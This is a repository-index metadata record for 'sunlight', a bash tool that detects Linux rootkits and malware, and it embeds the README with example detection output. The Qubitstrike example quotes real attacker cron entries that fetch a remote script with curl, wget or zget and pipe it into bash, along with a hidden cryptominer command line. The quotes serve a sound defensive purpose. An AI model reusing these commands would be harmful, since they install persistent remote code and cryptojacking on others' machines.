{"id":19789166,"url":"https://github.com/tstromberg/sunlight","last_synced_at":"2025-05-01T00:32:01.691Z","repository":{"id":147896938,"uuid":"606045479","full_name":"tstromberg/sunlight","owner":"tstromberg","description":"Linux #rootkit and #malware revealer","archived":false,"fork":false,"pushed_at":"2024-08-01T14:01:38.000Z","size":472,"stargazers_count":13,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-08-01T15:44:22.016Z","etag":null,"topics":["linux","malware","rootkit","rootkit-hunter"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tstromberg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-02-24T13:29:09.000Z","updated_at":"2024-03-13T20:17:39.000Z","dependencies_parsed_at":"2023-10-23T15:38:02.101Z","dependency_job_id":"a1c432e6-21c1-47e6-9e94-b75c8c109069","html_url":"https://github.com/tstromberg/sunlight","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tstromberg","download_url":"https://codeload.github.com/tstromberg/sunlight/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224230491,"owners_count":17277349,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux","malware","rootkit","rootkit-hunter"],"created_at":"2024-11-12T06:30:10.106Z","updated_at":"2024-11-12T06:30:10.801Z","avatar_url":"https://github.com/tstromberg.png","language":"Shell","readme":"# sunlight\n\n[![Latest Release](https://img.shields.io/github/v/release/tstromberg/sunlight?include_prereleases)](https://github.com/tstromberg/sunlight/releases/latest)\n[![stable](https://badges.github.io/stability-badges/dist/stable.svg)](https://github.com/badges/stability-badges)\n\nsunlight is a tool to reveal Linux rootkits (including eBPF) and other malware. It's written in bash, so it's easy to understand or take apart.\n\n![example](images/logo.png?raw=true \"logo\")\n\n## Requirements\n\nThe following are required:\n\n* Linux (some checks work on other UNIX platforms)\n* bash\n\nThe following tools are optional but highly recommended:\n\n* `osqueryi` - for comprehensive process analysis\n* `bpftool`, `jq` - for eBPF analysis\n\n## Usage\n\nTo run all of the scripts:\n\n```shell\nsudo ./sunlight.sh\n```\n\nTo run a single script:\n\n```shell\n./mystery-char-device.sh\n```\n\n## Example output (Qubitstrike)\n\nOn a host infected with Qubitstrike (which in turn installs Diamorphine), sunlight shows the following output:\n\n```log\n-- [ hidden-files.sh ] ---------------------------------------------------------\n   793453      4 drwxr-xr-x   2 root     root         4096 Oct 20 02:06 /usr/share/.28810\n   762662      4 drwxr-xr-x   2 root     root         4096 Oct 23 15:23 /usr/share/.LQvKibDTq4\n\n-- [ hidden-pids.sh ] ----------------------------------------------------------\n- hidden python-dev[22076] is running /usr/share/.LQvKibDTq4/python-dev: /usr/share/.LQvKibDTq4/python-dev -B -o pool.hashvault.pro:80 -u 49qQh9VMzdJTP1XA2yPDSx1QbYkDFupydE5AJAA3jQKTh3xUYVyutg28k2PtZGx8z3P2SS7VWKMQUb9Q4WjZ3jdmHPjoJRo -p 136.54.68.146 --donate-level 1 --tls --tls-fingerprint=420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 --max-cpu-usage 90 \n\n-- [ kernel-taint.sh ] ---------------------------------------------------------\nkernel taint value: 12288\n* matches bit 12: externally-built (out-of-tree) module was loaded\n* matches bit 13: unsigned module was loaded\n\ndmesg:\n[ 1429.084807] diamorphine: loading out-of-tree module taints kernel.\n[ 1429.086163] diamorphine: module verification failed: signature and/or required key missing - tainting kernel\n\n-- [ root-ssh-authorized-keys.sh ] ---------------------------------------------\nroot ssh keys found:\n--------------------\n  File: /root/.ssh/authorized_keys\n  Size: 563        Blocks: 8          IO Block: 4096   regular file\nDevice: 252,1 Inode: 74748       Links: 1\nAccess: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2023-10-23 15:16:53.720318244 +0000\nModify: 2023-10-23 14:50:47.836000000 +0000\nChange: 2023-10-23 15:16:53.708318146 +0000\n Birth: 2023-10-18 18:19:24.854873239 +0000\n\nssh-rsa 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 root@kali\nfailed with 1\n\n-- [ rootkit-signal-handler.sh ] -----------------------------------------------\nNOTE: root-escalation detection requires a non-root user\n- SIGNAL 31 made /proc/51645 (this process) invisible!\n- SIGNAL 63 caused /proc/modules to change:\n--- /tmp/tmp.Kl6Zm2Jk8l 2023-10-23 15:45:26.596006729 +0000\n+++ /tmp/tmp.XCSOBYg4Gu 2023-10-23 15:45:26.780007070 +0000\n@@ -10,6 +10,7 @@\n bridge\n btrfs\n ccp\n+diamorphine\n dm_multipath\n drm\n drm_kms_helper\n- SIGNAL 31 made /proc/51645 (this process) visible again!\n- SIGNAL 63 caused /proc/modules to change:\n--- /tmp/tmp.A6hTPpB1Vh 2023-10-23 15:45:53.924059225 +0000\n+++ /tmp/tmp.9PeU5G9c6v 2023-10-23 15:45:54.104059583 +0000\n@@ -10,7 +10,6 @@\n bridge\n btrfs\n ccp\n-diamorphine\n dm_multipath\n drm\n drm_kms_helper\n\n-- [ suspicious-cron.sh ] ------------------------------------------------------\nno crontab for root\n/etc/cron.d/netns:*/1 * * * * root /usr/share/.28810/kthreadd\n/etc/cron.d/apache2.2:@daily root zget -q -O - https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash\n/etc/cron.d/apache2:@reboot root /usr/share/.LQvKibDTq4/python-dev -c /usr/share/.LQvKibDTq4/config.json\n/etc/cron.d/netns2:0 0 */2 * * * root curl https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash\n/etc/crontab:0 * * * * wget -O- https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash \u003e /dev/null 2\u003e\u00261\n/etc/crontab:0 0 */3 * * * zget -q -O - https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash \u003e /dev/null 2\u003e\u00261\nfailed with 1\n```\n\n## Example output (reveng_rtkit)\n\n```log\n-- [ kernel-taint.sh ] ---------------------------------------------------------\nkernel taint value: 12288\n* matches bit 12: externally-built (out-of-tree) module was loaded\n* matches bit 13: unsigned module was loaded\n\ndmesg:\n[  368.765518] reveng_rtkit: loading out-of-tree module taints kernel.\n[  368.777600] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel\n\n-- [ mystery-char-devices.sh ] -------------------------------------------------\nlow dynamic major device etx_device[247]\n* crw------- 1 root root 247, 0 Mar  3 19:48 /dev/etx_device\n* /proc/devices: 247 etx_Dev\n```\n\n## Example output (TripleCross, an eBPF rootkit)\n\n```log\n-- [ unexpected-ebpf-hooks.sh ] ------------------------------------------------\n* Found interface with network traffic-control filtering enabled (tc qdisc):\nqdisc clsact ffff: dev eth0 parent ffff:fff1 \n\n* Found unexpected eBPF filesystem entry:\n/sys/fs/bpf/backdoor_phantom_shell\n\n* Unexpected eBPF map found:\n{\n  \"id\": 9,\n  \"type\": \"hash\",\n  \"name\": \"backdoor_phanto\",\n  \"flags\": 0,\n  \"bytes_key\": 8,\n  \"bytes_value\": 76,\n  \"max_entries\": 1,\n  \"bytes_memlock\": 4096,\n  \"frozen\": 0,\n  \"btf_id\": 92\n}\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftstromberg%2Fsunlight","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftstromberg%2Fsunlight","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftstromberg%2Fsunlight/lists"}